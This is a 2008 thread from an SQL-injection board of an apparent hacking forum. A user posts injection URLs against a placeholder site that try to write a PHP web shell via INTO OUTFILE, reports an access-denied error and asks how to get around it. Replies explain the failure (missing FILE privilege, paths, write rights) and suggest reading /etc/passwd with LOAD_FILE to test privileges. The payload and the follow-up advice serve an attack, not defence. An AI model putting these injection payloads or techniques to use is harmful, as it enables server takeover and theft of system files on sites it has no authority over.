|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SELECT "test" INTO OUTFILE BLOCKED |
|
Posted: Tue Oct 28, 2008 12:08 pm |
|
|
bala |
Beginner |
|
|
Joined: Oct 28, 2008 |
Posts: 1 |
|
|
|
|
|
|
|
Hello everybody
I tried
www.target.com/news.php?newsID=0+union+select+"<?php system($_REQUEST['cmd']); ?>",1,2,3,4,5,6,7,8,9,10 INTO OUTFILE "shell.php"--
Access denied for user: 'zbuxki@201.134.244.115' (Using password: YES)
Also I tried a similar thing
www.target.com/news.php?newsID=0+union+select+"Hello World",1,2,3,4,5,6,7,8,9,10 INTO OUTFILE "zbas.html"--
and didn't worked , both.
Access denied for user: 'zbuxki@201.134.244.115' (Using password: YES)
So what are my possibilities to bypass this ? have ways,manners ?
Bye guyss |
|
|
|
|
Posted: Tue Oct 28, 2008 1:38 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
You don't have file priv. |
|
|
|
|
Posted: Tue Oct 28, 2008 1:38 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
I see four possible problems here:
1. you probably don't have FILE prviliges to use mysql file-related functionality
2. you can't use relative path, instead use full path
3. mysql daemon must have write privileges to target directory
4. file must not exist allready, because "INTO OUTFILE" will not overwrite any files
So your best shot is to try LOAD_FILE(), for example "LOAD_FILE('/etc/passwd')". If this works, then you have FILE privileges, if not, then no way to use mysql file-related functions in current user context
P.S. ---> Pexli, you was faster |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|